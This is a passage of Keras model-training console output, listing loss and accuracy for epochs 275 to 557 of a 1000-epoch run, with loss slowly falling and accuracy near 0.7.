[==============================] - 0s 5ms/step - loss: 0.7345 - accuracy: 0.7000\nEpoch 276/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7493 - accuracy: 0.6800\nEpoch 277/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7320 - accuracy: 0.6800\nEpoch 278/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7372 - accuracy: 0.6800\nEpoch 279/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7289 - accuracy: 0.6600\nEpoch 280/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7457 - accuracy: 0.6800\nEpoch 281/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7642 - accuracy: 0.6600\nEpoch 282/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7616 - accuracy: 0.6600\nEpoch 283/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7458 - accuracy: 0.6400\nEpoch 284/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7229 - accuracy: 0.6400\nEpoch 285/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7258 - accuracy: 0.6800\nEpoch 286/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7210 - accuracy: 0.7000\nEpoch 287/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7182 - accuracy: 0.7000\nEpoch 288/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7241 - accuracy: 0.7000\nEpoch 289/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7209 - accuracy: 0.7200\nEpoch 290/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7340 - accuracy: 0.6800\nEpoch 291/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7395 - accuracy: 0.7000\nEpoch 292/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.7297 - accuracy: 0.7200\nEpoch 293/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7186 - accuracy: 0.7000\nEpoch 294/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7221 - accuracy: 0.6800\nEpoch 295/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7439 - accuracy: 0.7200\nEpoch 296/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7260 - accuracy: 0.7000\nEpoch 297/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7104 - accuracy: 0.6800\nEpoch 298/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7036 - accuracy: 0.6800\nEpoch 299/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7110 - accuracy: 0.6800\nEpoch 300/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7061 - accuracy: 0.6800\nEpoch 301/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7031 - accuracy: 0.7000\nEpoch 302/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7185 - accuracy: 0.7000\nEpoch 303/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7124 - accuracy: 0.7000\nEpoch 304/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7066 - accuracy: 0.7000\nEpoch 305/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7162 - accuracy: 0.6600\nEpoch 306/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7094 - accuracy: 0.6800\nEpoch 307/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7098 - accuracy: 0.7000\nEpoch 308/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7254 - accuracy: 0.7000\nEpoch 309/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.6981 - accuracy: 0.6800\nEpoch 310/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7105 - accuracy: 0.7200\nEpoch 311/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.7199 - accuracy: 0.6800\nEpoch 312/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7253 - accuracy: 0.7000\nEpoch 313/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7035 - accuracy: 0.7000\nEpoch 314/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7003 - accuracy: 0.6200\nEpoch 315/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7006 - accuracy: 0.7000\nEpoch 316/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7140 - accuracy: 0.7200\nEpoch 317/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7010 - accuracy: 0.7000\nEpoch 318/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6835 - accuracy: 0.6800\nEpoch 319/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6993 - accuracy: 0.7000\nEpoch 320/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7144 - accuracy: 0.6800\nEpoch 321/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7159 - accuracy: 0.7200\nEpoch 322/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7218 - accuracy: 0.6800\nEpoch 323/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6991 - accuracy: 0.7000\nEpoch 324/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7013 - accuracy: 0.6800\nEpoch 325/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7005 - accuracy: 0.7200\nEpoch 326/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7097 - accuracy: 0.7000\nEpoch 327/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6824 - accuracy: 0.7000\nEpoch 328/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6969 - accuracy: 0.7000\nEpoch 329/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7062 - accuracy: 0.6800\nEpoch 330/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6909 - accuracy: 0.7000\nEpoch 331/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6952 - accuracy: 0.7000\nEpoch 332/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7195 - accuracy: 0.6600\nEpoch 333/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6881 - accuracy: 0.6800\nEpoch 334/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6965 - accuracy: 0.6600\nEpoch 335/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6879 - accuracy: 0.7200\nEpoch 336/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6951 - accuracy: 0.6800\nEpoch 337/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6823 - accuracy: 0.7000\nEpoch 338/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6772 - accuracy: 0.7200\nEpoch 339/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6922 - accuracy: 0.7000\nEpoch 340/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6851 - accuracy: 0.6800\nEpoch 341/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7301 - accuracy: 0.7000\nEpoch 342/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7045 - accuracy: 0.6400\nEpoch 343/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.6840 - accuracy: 0.7200\nEpoch 344/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.6994 - accuracy: 0.6800\nEpoch 345/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6833 - accuracy: 0.7200\nEpoch 346/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6804 - accuracy: 0.7000\nEpoch 347/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6819 - accuracy: 0.7000\nEpoch 348/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6964 - accuracy: 0.6800\nEpoch 349/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6979 - accuracy: 0.7000\nEpoch 350/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6938 - accuracy: 0.7200\nEpoch 351/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7131 - accuracy: 0.7000\nEpoch 352/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6709 - accuracy: 0.6800\nEpoch 353/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6902 - accuracy: 0.6600\nEpoch 354/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7094 - accuracy: 0.6400\nEpoch 355/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7081 - accuracy: 0.7000\nEpoch 356/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6767 - accuracy: 0.6800\nEpoch 357/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6777 - accuracy: 0.7200\nEpoch 358/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6758 - accuracy: 0.6800\nEpoch 359/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6587 - accuracy: 0.7200\nEpoch 360/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6772 - accuracy: 0.7000\nEpoch 361/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6927 - accuracy: 0.6800\nEpoch 362/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6601 - accuracy: 0.7000\nEpoch 363/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6578 - accuracy: 0.7200\nEpoch 364/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6662 - accuracy: 0.7200\nEpoch 365/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6887 - accuracy: 0.6800\nEpoch 366/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6650 - accuracy: 0.6800\nEpoch 367/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6783 - accuracy: 0.7200\nEpoch 368/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6534 - accuracy: 0.7000\nEpoch 369/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6575 - accuracy: 0.7000\nEpoch 370/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6502 - accuracy: 0.7400\nEpoch 371/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6664 - accuracy: 0.7200\nEpoch 372/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6579 - accuracy: 0.7200\nEpoch 373/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6631 - accuracy: 0.7000\nEpoch 374/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6596 - accuracy: 0.7400\nEpoch 375/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6641 - accuracy: 0.7200\nEpoch 376/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6622 - accuracy: 0.7000\nEpoch 377/1000\n10/10 
[==============================] - 0s 6ms/step - loss: 0.6746 - accuracy: 0.6600\nEpoch 378/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6592 - accuracy: 0.6800\nEpoch 379/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6495 - accuracy: 0.7800\nEpoch 380/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6818 - accuracy: 0.6800\nEpoch 381/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6814 - accuracy: 0.6800\nEpoch 382/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6495 - accuracy: 0.7200\nEpoch 383/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6603 - accuracy: 0.7200\nEpoch 384/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6364 - accuracy: 0.7200\nEpoch 385/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6541 - accuracy: 0.7200\nEpoch 386/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6581 - accuracy: 0.7200\nEpoch 387/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6519 - accuracy: 0.7200\nEpoch 388/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6510 - accuracy: 0.7200\nEpoch 389/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6645 - accuracy: 0.7000\nEpoch 390/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.6405 - accuracy: 0.7000\nEpoch 391/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.6514 - accuracy: 0.7000\nEpoch 392/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6460 - accuracy: 0.6800\nEpoch 393/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6434 - accuracy: 0.7200\nEpoch 394/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6412 - accuracy: 0.7200\nEpoch 395/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6447 - accuracy: 0.7400\nEpoch 396/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6700 - accuracy: 0.6800\nEpoch 397/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6487 - accuracy: 0.7200\nEpoch 398/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6379 - accuracy: 0.7400\nEpoch 399/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6291 - accuracy: 0.7200\nEpoch 400/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6331 - accuracy: 0.7400\nEpoch 401/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6291 - accuracy: 0.7200\nEpoch 402/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6413 - accuracy: 0.7200\nEpoch 403/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6756 - accuracy: 0.7000\nEpoch 404/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6304 - accuracy: 0.7400\nEpoch 405/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6465 - accuracy: 0.7000\nEpoch 406/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6394 - accuracy: 0.7000\nEpoch 407/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6702 - accuracy: 0.6800\nEpoch 408/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6884 - accuracy: 0.6600\nEpoch 409/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6346 - accuracy: 0.7200\nEpoch 410/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6307 - accuracy: 0.6800\nEpoch 411/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.6529 - accuracy: 0.7600\nEpoch 412/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6639 - accuracy: 0.7200\nEpoch 413/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6547 - accuracy: 0.7400\nEpoch 414/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6384 - accuracy: 0.6800\nEpoch 415/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6217 - accuracy: 0.7200\nEpoch 416/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.6194 - accuracy: 0.7200\nEpoch 417/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6225 - accuracy: 0.7200\nEpoch 418/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6241 - accuracy: 0.6800\nEpoch 419/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6204 - accuracy: 0.7200\nEpoch 420/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6367 - accuracy: 0.7200\nEpoch 421/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6250 - accuracy: 0.7400\nEpoch 422/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6149 - accuracy: 0.7200\nEpoch 423/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6229 - accuracy: 0.7400\nEpoch 424/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6166 - accuracy: 0.7400\nEpoch 425/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6241 - accuracy: 0.7400\nEpoch 426/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6293 - accuracy: 0.7400\nEpoch 427/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6138 - accuracy: 0.7600\nEpoch 428/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6213 - accuracy: 0.7200\nEpoch 429/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6279 - accuracy: 0.7600\nEpoch 430/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6205 - accuracy: 0.7600\nEpoch 431/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6126 - accuracy: 0.7200\nEpoch 432/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6301 - accuracy: 0.7200\nEpoch 433/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6269 - accuracy: 0.7600\nEpoch 434/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6099 - accuracy: 0.7200\nEpoch 435/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6008 - accuracy: 0.7200\nEpoch 436/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6185 - accuracy: 0.6800\nEpoch 437/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6449 - accuracy: 0.7200\nEpoch 438/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6365 - accuracy: 0.6800\nEpoch 439/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6863 - accuracy: 0.7000\nEpoch 440/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6331 - accuracy: 0.7600\nEpoch 441/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6081 - accuracy: 0.7200\nEpoch 442/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6089 - accuracy: 0.7000\nEpoch 443/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6319 - accuracy: 0.7200\nEpoch 444/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6829 - accuracy: 0.7200\nEpoch 445/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.7236 - accuracy: 0.6600\nEpoch 446/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6254 - accuracy: 0.7200\nEpoch 447/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6260 - accuracy: 0.6800\nEpoch 448/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6072 - accuracy: 0.7400\nEpoch 449/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5981 - accuracy: 0.7200\nEpoch 450/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6222 - accuracy: 0.7000\nEpoch 451/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6096 - accuracy: 0.7600\nEpoch 452/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6114 - accuracy: 0.7800\nEpoch 453/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6007 - accuracy: 0.7400\nEpoch 454/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6003 - accuracy: 0.7400\nEpoch 455/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5904 - accuracy: 0.7600\nEpoch 456/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5900 - accuracy: 0.7600\nEpoch 457/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5943 - accuracy: 0.7400\nEpoch 458/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6129 - accuracy: 0.7200\nEpoch 459/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6079 - accuracy: 0.7400\nEpoch 460/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6154 - accuracy: 0.7400\nEpoch 461/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6387 - accuracy: 0.7400\nEpoch 462/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6002 - accuracy: 0.7400\nEpoch 463/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6033 - accuracy: 0.7400\nEpoch 464/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5998 - accuracy: 0.7200\nEpoch 465/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5942 - accuracy: 0.7400\nEpoch 466/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5829 - accuracy: 0.7600\nEpoch 467/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6015 - accuracy: 0.7200\nEpoch 468/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5935 - accuracy: 0.7600\nEpoch 469/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5954 - accuracy: 0.7200\nEpoch 470/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6032 - accuracy: 0.7600\nEpoch 471/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5902 - accuracy: 0.8000\nEpoch 472/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6062 - accuracy: 0.7200\nEpoch 473/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6134 - accuracy: 0.7400\nEpoch 474/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5974 - accuracy: 0.7800\nEpoch 475/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5807 - accuracy: 0.7600\nEpoch 476/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6103 - accuracy: 0.6800\nEpoch 477/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5952 - accuracy: 0.7200\nEpoch 478/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6011 - accuracy: 0.7800\nEpoch 479/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.5868 - accuracy: 0.7600\nEpoch 480/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5792 - accuracy: 0.7600\nEpoch 481/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5941 - accuracy: 0.7400\nEpoch 482/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5971 - accuracy: 0.7400\nEpoch 483/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6012 - accuracy: 0.7000\nEpoch 484/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5838 - accuracy: 0.7200\nEpoch 485/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5848 - accuracy: 0.7600\nEpoch 486/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6009 - accuracy: 0.7400\nEpoch 487/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6001 - accuracy: 0.7200\nEpoch 488/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5965 - accuracy: 0.7000\nEpoch 489/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6198 - accuracy: 0.7600\nEpoch 490/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5724 - accuracy: 0.7800\nEpoch 491/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5985 - accuracy: 0.7200\nEpoch 492/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5833 - accuracy: 0.7600\nEpoch 493/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5936 - accuracy: 0.7400\nEpoch 494/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6148 - accuracy: 0.7600\nEpoch 495/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6086 - accuracy: 0.7400\nEpoch 496/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6204 - accuracy: 0.7000\nEpoch 497/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5858 - accuracy: 0.7200\nEpoch 498/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5855 - accuracy: 0.7200\nEpoch 499/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5827 - accuracy: 0.7200\nEpoch 500/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5712 - accuracy: 0.7800\nEpoch 501/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5814 - accuracy: 0.7600\nEpoch 502/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5616 - accuracy: 0.7800\nEpoch 503/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5911 - accuracy: 0.7600\nEpoch 504/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5779 - accuracy: 0.7800\nEpoch 505/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5996 - accuracy: 0.7200\nEpoch 506/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5881 - accuracy: 0.7600\nEpoch 507/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5939 - accuracy: 0.7200\nEpoch 508/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5866 - accuracy: 0.7400\nEpoch 509/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6126 - accuracy: 0.7600\nEpoch 510/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6294 - accuracy: 0.7400\nEpoch 511/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5834 - accuracy: 0.7000\nEpoch 512/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5889 - accuracy: 0.7400\nEpoch 513/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.5689 - accuracy: 0.7600\nEpoch 514/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5679 - accuracy: 0.7800\nEpoch 515/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5683 - accuracy: 0.7200\nEpoch 516/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5838 - accuracy: 0.7600\nEpoch 517/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5794 - accuracy: 0.7400\nEpoch 518/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5941 - accuracy: 0.7200\nEpoch 519/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5757 - accuracy: 0.7600\nEpoch 520/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5681 - accuracy: 0.7400\nEpoch 521/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5876 - accuracy: 0.7800\nEpoch 522/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5772 - accuracy: 0.7400\nEpoch 523/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5741 - accuracy: 0.7400\nEpoch 524/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5972 - accuracy: 0.7200\nEpoch 525/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5869 - accuracy: 0.7800\nEpoch 526/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5733 - accuracy: 0.7800\nEpoch 527/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6015 - accuracy: 0.7200\nEpoch 528/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5726 - accuracy: 0.8000\nEpoch 529/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5967 - accuracy: 0.7400\nEpoch 530/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5712 - accuracy: 0.7800\nEpoch 531/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5933 - accuracy: 0.7400\nEpoch 532/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5848 - accuracy: 0.7600\nEpoch 533/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5698 - accuracy: 0.7400\nEpoch 534/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5664 - accuracy: 0.7200\nEpoch 535/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5733 - accuracy: 0.7200\nEpoch 536/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5675 - accuracy: 0.7200\nEpoch 537/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5906 - accuracy: 0.7400\nEpoch 538/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5857 - accuracy: 0.7600\nEpoch 539/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6543 - accuracy: 0.6800\nEpoch 540/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5519 - accuracy: 0.7600\nEpoch 541/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5819 - accuracy: 0.7600\nEpoch 542/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5833 - accuracy: 0.7200\nEpoch 543/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6326 - accuracy: 0.6600\nEpoch 544/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6292 - accuracy: 0.6800\nEpoch 545/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5948 - accuracy: 0.7600\nEpoch 546/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6081 - accuracy: 0.7600\nEpoch 547/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.5888 - accuracy: 0.7800\nEpoch 548/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5754 - accuracy: 0.7800\nEpoch 549/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5593 - accuracy: 0.8000\nEpoch 550/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5562 - accuracy: 0.7600\nEpoch 551/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5430 - accuracy: 0.7800\nEpoch 552/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5498 - accuracy: 0.7400\nEpoch 553/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5658 - accuracy: 0.7600\nEpoch 554/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5554 - accuracy: 0.7600\nEpoch 555/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5511 - accuracy: 0.7400\nEpoch 556/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5512 - accuracy: 0.7600\nEpoch 557/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5772 - accuracy: 0.7200\nEpoch 